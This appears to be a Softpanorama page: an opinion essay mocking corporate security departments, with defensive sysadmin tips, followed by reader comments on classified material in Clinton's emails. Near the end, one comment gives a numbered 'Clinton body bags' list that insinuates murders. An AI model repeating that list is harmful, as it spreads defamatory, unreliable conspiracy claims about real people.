Softpanorama
May the source be with you, but remember the KISS principle ;-)

Contents Bulletin Scripting in shell and Perl Network troubleshooting History Humor

Potemkin Villages of Computer Security

News Slightly Skeptical View on Enterprise Unix Administration Recommended Links Big Uncle is Watching You Privacy is Dead – Get Over It Cloud providers as intelligence collection hubs Tutorials Articles
"Softpanorama laws of security" An observation about corporate security departments Solaris Security Red Hat security Suse Security Managing AIX logs AIX security Hardening
Classic Open Source Security Tools Perl Scripts Integrity Checkers Port Scanners Logs Security & Integrity Syslog analyzers Syslog Anomaly Detection Analyzers eMail Security
Identity theft Intrusion detection Audit and Hardening Firewalls Network Security DB_security Top Vulnerabilities In Linux Environment Nephophobia: avoiding clouds
Security Certifications CISSP Certification DNS Security Important Government publications Hype Sysadmin Horror Stories Humor Etc


"Just as in the private sector, many federal agencies are reluctant to make the investments required in this area [of computer security] because of limited budgets, lack of direction and prioritization from senior officials, and general ignorance of the threat."

-- Statement of Gary R. Bachula, Acting Under Secretary for Technology, Department of Commerce, before House Science Subcommittee on Technology, June 19, 1997


Introduction

Work in a large organization tends to expand uncontrollably to fill all the time available for those who are assigned to perform it and consume all the resources assigned. This is especially typical for security departments which are often unable to do any useful job and replace it with imitation of activity in form of various policies and check lists.

In other words Parkinson's law is perfectly applicable. Parkinson provided a very relevant example that UK ministry has the most staff and moved to a larger, more plush building after Britain lost all colonies. This is very relevant example security wise, if we think about "After Snowden" and after "CryptoLocker" situation with security.

Horse has left the barn but security departments now are better staffed and perform more useless work creating additional load on other parts of IT and end users, which lower the profitability of the company.

In other words we need to accept that any computer connected to network is an insecure computer, and only the degrees on insecurity can vary. So all this recent fuss, for example, about particular SSL vulnerability should be treated with skepticism it deserves. The law of infinite numbers states that if you subtract one from an infinite number it remains an infinite number.

The key decisions that affect security in a large organization are done by system architects, not anybody else. Security group generally serves the role of night cleaners in the supermarket. And generally they are usually equally clueless ;-) Most of activates outside architecture related issues often belongs to "imitation of activity" that Parkinson law is talking about. And while 80% is useless, out of those 80%, approximately 20% is definitely harmful. like Talleyrand used to say: First and foremost try to avoid excessive zeal.

As of today the quote Gary R. Bachula above does not stands the test of the time. And that main reason is related to NSA which definitely was not constrained by a limited budget. But "lack of direction and prioritization from senior officials" as well as "ignorance" (not so much "ignorance of the threat" but general corporate and military-style ignorance of brass ;-) are still here. So a lot of money nationwide are wasted on computer security. But generally computer security is just a part of general security and moves in sync with higher level priorities such as protection of the elite. Edward Snowden revelations did shatter some myths as now it is clear that a powerful government organization is working to undermine the security of the Internet (NSA Inside the FIVE-EYED VAMPIRE SQUID of the INTERNET • The Register):

Everything about the safety of the internet as a common communication medium has been shown to be broken. As with the banking disasters of 2008, the crisis and damage created - not by Snowden and his helpers, but by the unregulated and unrestrained conduct the leaked documents have exposed - will last for years if not decades.

... ... ...

The NSA's explicit objective is to weaken the security of the entire physical fabric of the net. One of its declared goals is to "shape the worldwide commercial cryptography market to make it more tractable to advanced cryptanalytic capabilities being developed by the NSA", according to top secret documents provided by Snowden.

Profiling the global machinations of merchant bank Goldman Sachs in Rolling Stone in 2009, journalist Matt Taibbi famously characterized them as operating "everywhere ... a great vampire squid wrapped around the face of humanity, relentlessly jamming its blood funnel into anything that smells like money”.

The NSA, with its English-speaking "Five Eyes" partners (the relevant agencies of the UK, USA, Australia, New Zealand and Canada) and a hitherto unknown secret network of corporate and government partners, has been revealed to be a similar creature. The Snowden documents chart communications funnels, taps, probes, "collection systems" and malware "implants" everywhere, jammed into data networks and tapped into cables or onto satellites.

Security in the large corporate environment attracts energetic know-nothings

On corporate level the stage of security is even more questionable then in government. Security in the large corporate environment attracts energetic know-nothings. In some organizations it also serves as a dumping ground for manages who proved to be useless in their assigned function, but who for some reason are difficult or impossible to get rid off. I know a case when a female sociopath was exiled into security because organization was afraid that she would exploit her gender in lawsuit if she is terminated (and this idea of using gender as a bullet-proof west by a female sociopath is more common that people realize). So there is always a danger that security in a particular organization is just a window dressing performed by people more concerted with their career and unable and unwilling to understand real challenges for the organization and its IT systems.

There is always a danger that security in a particular organization is just a window dressing performed by people more concerted with their career and unable and unwilling to understand real challenges for the organization and its IT systems.

Businesses used to be conservative and more realistic as they need to spend real money on security products. Still it is in security where snake oil salesmen have their most stunning successes. Even as mass media fret over everything from hacker threats to cyber terrorism and covers Anonymous exploits as if it is some three-latter agency operation (which it might be ;-), the majority of companies is reluctant to spend too much money on security, but still periodically blunder into acquiring some questionable and expensive products. Fashion rules and many corporations adopt some variant of the policy "Nobody was ever fired for buying IBM" ;-). Most (or at least some) people know that the lion share of those expenses will be completely wasted, but being politically correct is definitely more important. Voicing opposition to some brain-dead security initiative requires courage, the trait completely eliminated by adverse selection even at middle levels of corporate hierarchy.

A full 40% of IT managers recently surveyed by IDC cite IT security as their No. 1 priority (being politically correct helps). But less than 10% want to increase their security budgets (being slightly more realistic does not hurt either ;-).

At the end of the day many additional security measures does not save money or generate revenue. Most effective measures are often related to the architecture of the datacenter and the topology of the network and do not require (or require minimum) additional investment. Moreover often implemented measures are useless or even harmful (Potemkin villages) as they are breached by other steps taken which render them useless.

We should understand that 80% of the enterprise security is actually a byproduct of a sound architecture and other technical decisions (for example using Linux instead of Windows or Solaris instead of Linux). In many cases going off the popular brand of OS and application increasing security to a much higher level (via obscurity, and there is no shame to it) then paying top bucks to some Fortune 100 company for sending a couple of clueless or semi-clueless consultants who supposedly are able to fix the problems that the latest attack revealed in the infrastructure they do not understand :-).

And a lot of security consult activity is simply scam. As SOX compliance efforts has shown to the surprised world, the USA has a dubious advantage of having the most corrupt IT consultants by wide margin. In retrospect those SOX compliance efforts was such a blatant rip-off that most of the firms involved should probably share the destiny of Arthur Andersen.

In case of consultant it also can lead to the decision to buy and install YAPUST ("yet another pretty useless security tool"). For example network IDS are fashionable now, but in most cases they produce so many false positives that after a while all warnings are safely ignored and/or most useful (but noisy) rules are simply disabled ;-). Network IPS are mostly harmful and better be avoided unless the organization has top guns in networking group (in this case the question arise why they should be controlled by a security group and not oriented on larger domain helping to troubleshoot problem arising in networking ?). And senior administration still believes that IDS/IPS is in place and "the company is protected" ... See also "Softpanorama laws of security"

Actually semi-forgotten network IDS sensor is pretty benign example. "Security Uber Alles" types can do a lot of damage to productivity without any real improvements in security. IPS is only one of many way to harm the company. In some companies hidden sadists somehow became firewall administrators :-(.

Still, there are a few bright spots. The first one is open source security tools. They are free and some of them are as good or even better/more flexible than their commercial counterparts. Source code is available so they can be studied and modified to better suit the purposes of particular organization. That does not mean that there are no useless, badly-written open source security tools and scripts. But at least you can select the best available and try them.

Linux and Unix in general also has some built-in mechanisms that help to achieve security. For example mounting partitions can be done so that they can't run SUID scripts or in more strict faction generally executables. Suse has an interesting and very powerful subsystem called AppArmor. Virtual machines also can be used as a powerful security mechanism. They can be made disposable, which unless VM layer is breached exclude possibility to interfere with executables and config files.

Not to deploy such built-in mechanism in some cases is as close to negligence as one can get. Second is security training with some useful WEB resources both government (CERT, NIST National Checklist Program, SANS, SecurityFocus (hosts BugTrack list), searchSecurity, etc).

Security certification also might be useful, if you consider it not an end in itself, but as a first step. For additional references see also other pages on this site including my Solaris Security page and Security certification page. IS-security training for system and network administrators can substantially boost the level of security of IS without or with very little additional spending on additional packages. Importance of education and of realistic assessment of security situation and needs in a corporate environment is one reason why I created this page. Not that I have any illusions about any particular Security certification ;-). Still, there is a difference between various certification. I think Red Hat Certified Security Specialist (RHCSS) as well as similar Solaris certification are useful, while CISSP Certification is mostly windows dressing (and with annual fee is more like a scam). Here is a definition of this certification (Red Hat Red Hat Certified Security Specialist (RHCSS)):

A Red Hat® Certified Security Specialist (RHCSS) is a Red Hat Certified Engineer (RHCE®) whose status is current and who has earned the following Red Hat Certificates of Expertise:

Note: The Red Hat Certificate of Expertise in Server Hardening may be substituted for either the Red Hat Certificate of Expertise in Security: Network Services or Red Hat Certificate of Expertise in Directory Services and Authentication but not both.

That's why it's surprising to see that relatively few companies are making investments to ensure that their IT teams know how to secure their network and technology infrastructures, despite all the attention surrounding security after latest worms revelations. When it became clear that a typical Windows desktop or server can be penetrated by hijacking vendor and applications patches delivery channels (and that is applicable to any OS with vendor patch channel, although for Linux you can at least recompile patches). That does not mean that you should not use Windows or Windows servers, but you should think twice keeping any valuable information on them in unencrypted form. Unix is a better platform security wise, but also is vulnerable to a determined efforts. Trusted Solaris is has probably the best general purpose OS defense mechanisms and should be considered for large corporate environment, if security of data is really critical. Totally encrypted network channels also provide some level of security.

But it is important to remember that security is as good as the weakest link. And often the weakest link is qualification of people who are responsible for the security (and that means that in organization where security is of paramount important those issues should be delegated to system architects, as the most qualified specialists on the floor, not piggy holed into a separate, technically weak department)

According to the InformationWeek Global Information Security Survey, fielded by Pricewaterhouse Coopers, only 27% of U.S. companies have conducted security training for system and network administrators. That statistic is only slightly better than the one in four companies around the globe (the study reached 8,100 people in 50 countries) that have conducted such training. Please note that a lot of security training courses is actually a scam and they provide zero or even negative value. That's why self-education is so important. But of course it is preferable to get fundamentals

How to defend yourself from too zealous corporate security department

Security department in a large corporation is often staffed with people who are useless in any department and they became really harmful in this new for them role. One typical case is enthusiastic "know-nothings" who after the move to the security department almost instantly turn into script kiddies and are ready to test on internal corporate infrastructure (aka production servers) latest and greatest exploits downloaded from Internet, seeing such activity as their sacred duty inherent in this newly minted "security specialists" role.

So let's discuss how to protect ourselves from this "institutionalized" hackers who are often more clueless and no less ambitious then a typical teenager script kiddie (Wikipedia):

In a Carnegie Mellon report prepared for the U.S. Department of Defense in 2005, script kiddies are defined as

"The more immature but unfortunately often just as dangerous exploiter of security lapses on the Internet. The typical script kiddy uses existing and frequently well known and easy-to-find techniques and programs or scripts to search for and exploit weaknesses in other computers on the Internet—often randomly and with little regard or perhaps even understanding of the potentially harmful consequences.[5]

In this case you need to think about some defenses. Enabling firewall on an internal server is probably an overkill and might get you into hot water quicker than you can realize consequences of such a conversion. But enabling TCP wrappers can help in cutting oxygen for overzealous "know-nothings" who typically are able to operate only from a dozen of so IP addresses (and your friends in networking department can help to ensure this arrangement ;-).

The simplest way is to include into deny file those protocols that caused problem in previous scan attempts. For example ftp daemon sometimes crashes when subjected to sequence of packets representing exploit. HP-UX version of wu-ftpd is probably one of the weakest in this respect. Including in /etc/deny files selected hosts from which they run exploits can help. One thing that is necessary is to ensure that the particular daemon is compiled with TCP wrappers (which is the case for vsftpd and wu-ftpd) or run via xinetd on Linux or Solaris and via TCP wrappers on other Unixes.

Including SSH and telnet might also helpful as block the possibility of exploiting some unpatched servers. In this case even after inserting a new entry into /etc/passwd or something similar, it is impossible to login.

Another useful measure is creating baseline of /etc and several other vital directories (/root and cron files). Simple script comparing current status with the baseline is useful not only again those jerks but also provide important information about actions of your co-workers who sometimes make changes and forget to notify other people who administer the server.

And last but not least, new, unique entries in output of last command should be mailed to you within an hour. Same is for new, unique entries in  /var/adm/messages or /var/log/messages. Server in corporate environment mostly perform dull repeating tasks and one week of long serves as an excellent baseline of what to expect from the server. Any messages that are substantially different should generate report.

Dr. Nikolai Bezroukov


Top updates

Softpanorama Switchboard
Softpanorama Search


NEWS CONTENTS

Old News ;-)

[Jan 29, 2016] US government finds top secret information in Clinton emails

Notable quotes:
"... Oh, but it is serious. The material is/was classified. It just wasn't marked as such. Which means someone removed the classified material from a separate secure network and sent it to Hilary. We know from her other emails that, on more than one occasion, she requested that that be done. ..."
"... fellow diplomats and other specialists said on Thursday that if any emails were blatantly of a sensitive nature, she could have been expected to flag it. "She might have had some responsibility to blow the whistle," said former Ambassador Thomas Pickering, "The recipient may have an induced kind of responsibility," Pickering added, "if they see something that appears to be a serious breach of security." ..."
"... Finally whether they were marked or not the fact that an electronic copy resided on a server in an insecure location was basically like her making a copy and bringing it home and plunking it in a file cabinet... ..."
"... In Section 7 of her NDA, Clinton agreed to return any classified information she gained access to, and further agreed that failure to do so could be punished under Sections 793 and 1924 of the US Criminal Code. ..."
"... The agreement considers information classified whether it is "marked or unmarked." ..."
"... According to a State Department regulation in effect during Clinton's tenure (12 FAM 531), "classified material should not be stored at a facility outside the chancery, consulate, etc., merely for convenience." ..."
"... Additionally, a regulation established in 2012 (12 FAM 533.2) requires that "each employee, irrespective of rank must certify" that classified information "is not in their household or personal effects." ..."
"... As of December 2, 2009, the Foreign Affairs Manual has explicitly stated that "classified processing and/or classified conversation on a PDA is prohibited." ..."
"... Look, Hillary is sloppy about her affairs of state. She voted with Cheney for the Iraq disaster and jumped in supporting it. It is the greatest foreign affair disaster since Viet Nam and probably the greatest, period! She was a big proponent of getting rid of Khadaffi in Libya and now we have radical Islamic anarchy ravaging the failed state. She was all for the Arab Spring until the Muslim Brotherhood was voted into power in Egypt....which was replaced by yet another military dictatorship we support. And she had to have her own private e-mail server and it got used for questionable handling of state secrets. This is just Hillary being Hillary........ ..."
"... Its no secret that this hysterically ambitious Clinton woman is a warmonger and a hooker for Wall Street . No need to read her e-mails, just check her record. ..."
"... What was exemplary about an unnecessary war, a dumbass victory speech three or so months into it, the President's absence of support for his CIA agent outed by his staff, the President's German Chancellor shoulder massage, the use of RNC servers and subsequently "lost" gazillion emails, doing nothing in response to Twin Towers news, ditto for Katrina news, the withheld information from the Tillman family, and sanctioned torture? ..."
"... Another point that has perhaps not been covered sufficiently is the constant use of the phrase "unsecured email server" - which is intentionally vague and misleading and was almost certainly a phrase coined by someone who knows nothing about email servers or IT security and has been parroted mindlessly by people who know even less and journalists who should know better. ..."
"... Yet the term "unsecured" has many different meanings and implications - in the context of an email server it could mean that mail accounts are accessible without authentication, but in terms of network security it could mean that the server somehow existed outside a firewall or Virtual Private Network or some other form of physical or logical security. ..."
"... It is also extremely improbable that an email server would be the only device sharing that network segment - of necessity there would at least be a file server and some means of communicating with the outside world, most likely a router or a switch, which would by default have a built-in hardware firewall (way more secure than a software firewall). ..."
"... Anything generated related to a SAP is, by it's mere existence, classified at the most extreme level, and everyone who works on a SAP knows this intimately and you sign your life away to acknowledge this. ..."
"... yeah appointed by Obama...John Kerry. His state department. John is credited on both sides of the aisle of actually coming in and making the necessary changes to clean up the administrative mess either created or not addressed by his predecessor. ..."
"... Its not hard to understand, she was supposed to only use her official email account maintained on secure Federal government servers when conducting official business during her tenure as Secretary of State. This was for three reasons, the first being security the second being transparency and the third for accountability. ..."
"... You need to share that one with Petraeus, whos career was ruined and had to pay 100k in fines, for letting some info slip to his mistress.. ..."
"... If every corrupt liar was sent to prison there'd be no one left in Washington, or Westminster and we'd have to have elections with ordinary people standing, instead of the usual suspects from the political class. Which, on reflection, sounds quite good ! ..."
"... It's a reckless arrogance combined with the belief that no-one can touch her. If she does become the nominee Hillary will be an easy target for Trump. It'll be like "shooting fish in a barrel". ..."
"... It is obvious that the Secretary of State and the President should be communicating on a secure network controlled by the federal government. It is obvious that virtually none of these communications were done in a secure manner. Consider whether someone who contends this is irrelevant has enough sense to come in out of the rain. ..."
www.theguardian.com

The Obama administration confirmed for the first time on Friday that Hillary Clinton's unsecured home server contained some of the US government's most closely guarded secrets, censoring 22 emails with material demanding one of the highest levels of classification. The revelation comes just three days before the Iowa presidential nominating caucuses in which Clinton is a candidate.


jrhaddock -> MtnClimber 29 Jan 2016 23:04

Oh, but it is serious. The material is/was classified. It just wasn't marked as such. Which means someone removed the classified material from a separate secure network and sent it to Hilary. We know from her other emails that, on more than one occasion, she requested that that be done.

And she's not just some low level clerk who doesn't understand what classified material is or how it is handled. She had been the wife of the president so is certainly well aware of the security surrounding classified material. And then she was Sec of State and obviously knew what kind of information was classified. So to claim that the material wasn't marked, and therefore she didn't know it was classified, is simply not credulous.

Berkeley2013 29 Jan 2016 22:46

And Clinton had a considerable number of unvetted people maintain and administer her communication system. The potential for wrong doing in general and blackmail from many angles is great.

There's also the cost of this whole investigation. Why should US taxpayers have to pick up the bill?

And the waste of good personnel time---a total waste...

Skip Breitmeyer -> simpledino 29 Jan 2016 22:29

In one sense you're absolutely right- read carefully this article (and the announcement leading to it) raises at least as many questions as it answers, period. On the other hand, those ambiguities are certain not to be resolved 'over-the-weekend' (nor before the first votes are cast in Iowa) and thus the timing of the thing could not be more misfortunate for Ms. Clinton, nor more perfect for maximum effect than if the timing had been deliberately planned. In fact I'm surprised there aren't a raft of comments on this point. "Confirmed by the Obama administration..."? Who in the administration? What wing of the administration? Some jack-off in the justice dept. who got 50,000 g's for the scoop? The fact is, I'm actually with Bernie over Hilary any day, but I admit to a certain respect for her remarkable expertise and debate performances that have really shown the GOP boys to be a bunch of second-benchers... And there's something a little dirty and dodgy that's gone on here...

Adamnoggi dusablon 29 Jan 2016 22:23

SAP does not relate to To the level of classification. A special access program could be at the confidential level or higher dependent upon content. Special access means just that, access is granted on a case by case basis, regardless of classification level .


Gigi Trala La 29 Jan 2016 22:17

She is treated with remarkable indulgence. Anywhere with a sense of accountability she will be facing prosecution, and yet here she is running for even higher office. In the middle of demonstrating her unfitness.


eldudeabides 29 Jan 2016 22:15

Independent experts say it is highly unlikely that Clinton will be charged with wrongdoing, based on the limited details that have surfaced up to now and the lack of indications that she intended to break any laws.

since when has ignorance been a defence?


nataliesutler UzzDontSay 29 Jan 2016 22:05

Yes Petraeus did get this kind of scrutiny even though what he did was much less serious that what Clinton did. this isn't about a rule change. And pretending it is isn't going to fool anyone.


Sam3456 kattw 29 Jan 2016 21:18

Thats a misunderstanding on your part First lets look at Hillary's statement in March:

"I did not email any classified material to anyone on my email. There is no classified material. So I'm certainly well aware of the classification requirements and did not send classified material."

She later adjusted her language to note that she never sent anything "marked" classified. So already some Clinton-esque word parsing

And then what people said who used to do her job:

fellow diplomats and other specialists said on Thursday that if any emails were blatantly of a sensitive nature, she could have been expected to flag it.
"She might have had some responsibility to blow the whistle," said former Ambassador Thomas Pickering, "The recipient may have an induced kind of responsibility," Pickering added, "if they see something that appears to be a serious breach of security."

It is a view shared by J. William Leonard, who between 2002 and 2008 was director of the Information Security Oversight Office, which oversees the government classification system. He pointed out that all government officials given a security clearance are required to sign a nondisclosure agreement, which states they are responsible if secrets leak – whether the information was "marked or not."

Finally whether they were marked or not the fact that an electronic copy resided on a server in an insecure location was basically like her making a copy and bringing it home and plunking it in a file cabinet...

beanierose -> dusablon 29 Jan 2016 21:08

Yeah - I just don't understand what Hillary is actually accused of doing / or not doing in Benghazi. Was it that they didn't provide support to Stevens - (I think that was debunked) - was it that they claimed on the Sunday talk shows that the video was responsible for the attack (who cares). Now - I can think of an outrage - President Bush attacking Iraq on the specious claim that they had WMD - that was a lie/incorrec/incompetence and it cost ~7000 US and 200K to 700K Iraqi lives. Now - there's a scandal.

Stephen_Sean -> elexpatrioto 29 Jan 2016 21:07

The Secretary of State is an "original classifier" of information. The individual holding that office is responsible to recognize whether information is classified and to what level regardless if it is marked or not. She should have known. She has no true shelter of ignorance here.

Stephen_Sean 29 Jan 2016 21:00

The Guardian is whistling through the graveyard. The FBI is very close to a decision to recommend an indictment to the DOJ. At that point is up to POTUS whether he thinks Hillary is worth tainting his entire Presidency to protect by blocking a DOJ indictment. His responsibility as an outgoing President is to do what is best for his party and to provide his best attempt to get a Democrat elected. I smell Biden warming up in the bullpen as an emergency.

The last thing the DNC wants is a delay if their is going to be an indictment. For an indictment to come after she is nominated would be an unrecoverable blow for the Democrats. If their is to be an indictment its best for it to come now while they can still get Biden in and maintain their chances.

Sam3456 29 Jan 2016 20:57

In Section 7 of her NDA, Clinton agreed to return any classified information she gained access to, and further agreed that failure to do so could be punished under Sections 793 and 1924 of the US Criminal Code.

According To § 793 Of Title 18 Of The US Code, anyone who willfully retains, transmits or causes to be transmitted, national security information, can face up to ten years in prison.

According To § 1924 Of Title 18 Of The US Code, anyone who removes classified information " with the intent to retain such documents or materials at an unauthorized location," can face up to a year in prison.

The agreement considers information classified whether it is "marked or unmarked."

According to a State Department regulation in effect during Clinton's tenure (12 FAM 531), "classified material should not be stored at a facility outside the chancery, consulate, etc., merely for convenience."

Additionally, a regulation established in 2012 (12 FAM 533.2) requires that "each employee, irrespective of rank must certify" that classified information "is not in their household or personal effects."

As of December 2, 2009, the Foreign Affairs Manual has explicitly stated that "classified processing and/or classified conversation on a PDA is prohibited."

kus art 29 Jan 2016 20:54

I'm assuming that the censored emails reveal activities that the US government is into are Way more corrupt, insidious and venal as the the emails already exposed, which says a lot already...

Profhambone -> Bruce Hill 29 Jan 2016 20:53

Look, Hillary is sloppy about her affairs of state. She voted with Cheney for the Iraq disaster and jumped in supporting it. It is the greatest foreign affair disaster since Viet Nam and probably the greatest, period! She was a big proponent of getting rid of Khadaffi in Libya and now we have radical Islamic anarchy ravaging the failed state. She was all for the Arab Spring until the Muslim Brotherhood was voted into power in Egypt....which was replaced by yet another military dictatorship we support. And she had to have her own private e-mail server and it got used for questionable handling of state secrets. This is just Hillary being Hillary........


PsygonnUSA 29 Jan 2016 20:44

Its no secret that this hysterically ambitious Clinton woman is a warmonger and a hooker for Wall Street . No need to read her e-mails, just check her record.


USfan 29 Jan 2016 20:41

Sorry to be ranting but what does it say about a country - in theory, a democracy - that is implicated in so much questionable business around the world that we have to classify mountains of communication as off-limits to the people, who are theoretically sovereign in this country?

We've all gotten quite used to this. In reality, it should freak us out much more than it does. I'm not naive about what national security requires, but my sense is the government habitually and routinely classifies all sorts of things the people of this country have every right to know.

Assuming this is still a democracy, which is perhaps a big assumption.


Raleighchopper Bruce Hill 29 Jan 2016 20:40

far Left sites like the Guardian:

LMAOROFL
Scott Trust Ltd board
https://en.wikipedia.org/wiki/Scott_Trust_Limited

FirthyB 29 Jan 2016 20:36

Hillary is in that class, along with Goldman Sachs, JP Morgan, Bush, Cheney etc.. who believe the rule of law only pertains to the little guys.


MooseMcNaulty -> dusablon 29 Jan 2016 20:28

The spying was illegal on a Constitutional basis. The Fourth Amendment protects our privacy and prevents unlawful search and seizure. The government getting free access to the contents of our emails seems the same as opening our mail, which is illegal without a court order.

The drone program is illegal based on the Geneva accords. We are carrying out targeted killings within sovereign nations, usually without their knowledge or consent, based on secret evidence that they pose a vaguely defined 'imminent threat'. It isn't in line with any international law, though we set that precedent long ago.


makaio USfan 29 Jan 2016 20:08

What was exemplary about an unnecessary war, a dumbass victory speech three or so months into it, the President's absence of support for his CIA agent outed by his staff, the President's German Chancellor shoulder massage, the use of RNC servers and subsequently "lost" gazillion emails, doing nothing in response to Twin Towers news, ditto for Katrina news, the withheld information from the Tillman family, and sanctioned torture?

Those were just starter questions. I'm sure I missed things.


Raleighchopper -> Popeia 29 Jan 2016 20:05

http://www.reuters.com/article/us-usa-politics-clinton-idUSN2540811420080326


Rowan Walters 29 Jan 2016 19:51

Another point that has perhaps not been covered sufficiently is the constant use of the phrase "unsecured email server" - which is intentionally vague and misleading and was almost certainly a phrase coined by someone who knows nothing about email servers or IT security and has been parroted mindlessly by people who know even less and journalists who should know better.

As an IT professional the repeated use of a phrase like that is a red flag - it's like when people who don't know what they're talking about latch on to a phrase which sounds technical because it contains jargon or technical concepts and they use it to make it sound like they know what they're talking about but it doesn't actually mean anything unless the context is clear and unambiguous.

The phrase is obviously being repeated to convey the impression of supreme negligence - that sensitive state secrets were left defenceless and (gasp!) potentially accessible by anyone.

Yet the term "unsecured" has many different meanings and implications - in the context of an email server it could mean that mail accounts are accessible without authentication, but in terms of network security it could mean that the server somehow existed outside a firewall or Virtual Private Network or some other form of physical or logical security.

Does this term "unsecured" mean the data on the server was not password-protected, does it mean it was unencrypted, does it mean that it was totally unprotected (which is extremely unlikely even if it was installed by an ignorant Luddite given that any modern broadband modem is also a hardware firewall), and as for the "server" was it a physical box or a virtual server?

It is also extremely improbable that an email server would be the only device sharing that network segment - of necessity there would at least be a file server and some means of communicating with the outside world, most likely a router or a switch, which would by default have a built-in hardware firewall (way more secure than a software firewall).

And regarding the "unsecured" part, how was the network accessed?
There are a huge number of possibilities as to the actual meaning and on its own there is not enough information to deduce which - if any - is correct.

I suspect that someone who knows little to nothing about technology has invented this concept based on ignorance a desire to imply malfeasance because on its own it really is a nonsense term.


seanet1310 -> Wallabyfan 29 Jan 2016 19:37

Nope. Like it or not Manning deliberately took classified information, smuggled it out and gave it to foreign nationals.
Clinton it would appear mishandled classified material, at best she failed to realise the sensitive nature and at worst actively took material from controlled and classified networks onto an unsecured private network.


dusablon 29 Jan 2016 19:28

Classified material in the US is classified at three levels: confidential, secret, and top secret. Those labels are not applied in a cavalier fashion. The release of TS information is considered a grave threat to the security of the United States.

Above these classification levels is what is as known as Special Access Program information, the release of which has extremely grave ramifications for the US. Access to SAP material is extremely limited and only granted after an extensive personal background investigation and only on a 'need to know' basis. You don't simply get a SAP program clearance because your employer thinks it would be nice to have, etc. In fact, you can have a Top Secret clearance and never get a special access program clearance to go with it.

For those of you playing at home, the Top Secret SAP material Hillary had on her server - the most critical material the US can have - was not simply 'upgraded' to classified in a routine bureaucratic exercise because it was previously unclassified.

Anything generated related to a SAP is, by it's mere existence, classified at the most extreme level, and everyone who works on a SAP knows this intimately and you sign your life away to acknowledge this.

What the Feds did in Hillary's case in making the material on her home-based server Top Secret SAP was to bring those materials into what is known as 'accountability .'

That is, the material was always SAP material but it was just discovered outside a SAP lock-down area or secure system and now it must become 'accountable' at the high classification level to ensure it's protected from further disclosure.

Hillary and her minions have no excuse whatsoever for this intentional mishandling of this critical material and are in severe legal jeopardy no matter what disinformation her campaign puts out. Someone will or should go to prison. Period.

(Sorry for the length of the post)


Sam3456 -> Mark Forrester 29 Jan 2016 19:22

yeah appointed by Obama...John Kerry. His state department. John is credited on both sides of the aisle of actually coming in and making the necessary changes to clean up the administrative mess either created or not addressed by his predecessor.

Within weeks of taking the position JK implemented the OIG task forces recommendations to streamline the process and make State run more in line with other government organizations. I think John saw the "Sorry it snowed can't have you this info for a month" for what it was and acted out of decency and fairness to the American people. I still think he looks like a hound and is a political opportunist but you can't blame him for shenanigans here


chiefwiley -> DoktahZ 29 Jan 2016 19:18

The messages were "de-papered" by the staff, stripping them from their forms and headings and then scanning and including the content in accumulations to be sent and stored in an unclassified system. Taking the markings off of a classified document does not render it unclassified. Adding the markings back onto the documents does not "declare" them classified. Their classified nature was constant.

If you only have an unsecured system, it should never be used for official traffic, let alone classified or special access traffic.

dusablon -> MtnClimber 29 Jan 2016 19:05

Give it up.

She used a private server deliberately to avoid FOIA requests, she deleted thousands of emails after they were requested, and the emails that remained contained Top Secret Special Access Program information, and it does not matter one iota whether or not that material was marked or whether or not it has been recently classified appropriately.


chiefwiley -> Exceptionalism
29 Jan 2016 19:04

18USC Section793(f)

$250,000 and ten years.

dusablon -> MtnClimber 29 Jan 2016 19:00

False.

Anything related to a special access program is classified whether marked as such or not.

dalisnewcar 29 Jan 2016 18:58

You would figure that after all the lies of O'bomber that democrats might wake up some. Apparently, they are too stupid to realize they have been duped even after the entire Middle Class has been decimated and the wealth of the 1% has grown 3 fold under the man who has now bombed 7 countries. And you folks think Clinton, who personally destroyed Libya, is going to be honest with you and not do the same things he's done? Wake up folks. Your banging your head against the same old wall.

fanUS -> MtnClimber 29 Jan 2016 18:46

She is evil, because she helped Islamic State to rise.


Paul Christenson -> Barry_Seal 29 Jan 2016 18:45

20 - Barbara Wise - Commerce Department staffer. Worked closely with Ron Brown and John Huang. Cause of death unknown. Died November 29, 1996. Her bruised, nude body was found locked in her office at the Department of Commerce.

21 - Charles Meissner - Assistant Secretary of Commerce who gave John Huang special security clearance, died shortly thereafter in a small plane crash.

22 - Dr. Stanley Heard - Chairman of the National Chiropractic Health Care Advisory Committee died with his attorney Steve Dickson in a small plane crash. Dr. Heard, in addition to serving on Clinton 's advisory council personally treated Clinton 's mother, stepfather and Brother.

23 - Barry Seal - Drug running TWA pilot out of Mean Arkansas , death was no accident.

24 - John ny Lawhorn, Jr. - Mechanic, found a check made out to Bill Clinton in the trunk of a car left at his repair shop. He was found dead after his car had hit a utility pole.

25 - Stanley Huggins - Investigated Madison Guaranty. His death was a purported suicide and his report was never released.

26 - Hershel Friday - Attorney and Clinton fundraiser died March 1, 1994, when his plane exploded.

27 - Kevin Ives & Don Henry - Known as "The boys on the track" case. Reports say the two boys may have stumbled upon the Mena Arkansas airport drug operation. The initial report of death said their deaths were due to falling asleep on railroad tracks and being run over. Later autopsy reports stated that the 2 boys had been slain before being placed on the tracks. Many linked to the case died before their testimony could come before a Grand Jury.

THE FOLLOWING PERSONS HAD INFORMATION ON THE IVES/HENRY CASE:

28 - Keith Coney - Died when his motorcycle slammed into the back of a truck, 7/88.

29 - Keith McMaskle - Died, stabbed 113 times, Nov 1988

30 - Gregory Collins - Died from a gunshot wound January 1989.

31 - Jeff Rhodes - He was shot, mutilated and found burned in a trash dump in April 1989. (Coroner ruled death due to suicide)

32 - James Milan - Found decapitated. However, the Coroner ruled his death was due to natural causes"?

33 - Jordan Kettleson - Was found shot to death in the front seat of his pickup truck in June 1990.

34 - Richard Winters - A suspect in the Ives/Henry deaths. He was killed in a set-up robbery July 1989.

THE FOLLOWING CLINTON PERSONAL BODYGUARDS ALL DIED OF MYSTERIOUS CAUSES OR SUICIDE
36 - Major William S. Barkley, Jr.
37 - Captain Scott J . Reynolds
38 - Sgt. Brian Hanley
39 - Sgt. Tim Sabel
40 - Major General William Robertson
41 - Col. William Densberger
42 - Col. Robert Kelly
43 - Spec. Gary Rhodes
44 - Steve Willis
45 - Robert Williams
46 - Conway LeBleu
47 - Todd McKeehan

And this list does not include the four dead Americans in Benghazi that Hillary abandoned!


Paul Christenson Barry_Seal 29 Jan 2016 18:42

THE MANY CLINTON BODY BAGS . . .

Someone recently reminded me of this list. I had forgotten how long it is. Therefore, this is a quick refresher course, lest we forget what has happened to many "friends" and associates of Bill and Hillary Clinton.

1- James McDougal - Convicted Whitewater partner of the Clintons who died of an apparent heart attack, while in solitary confinement. He was a key witness in Ken Starr's investigation.

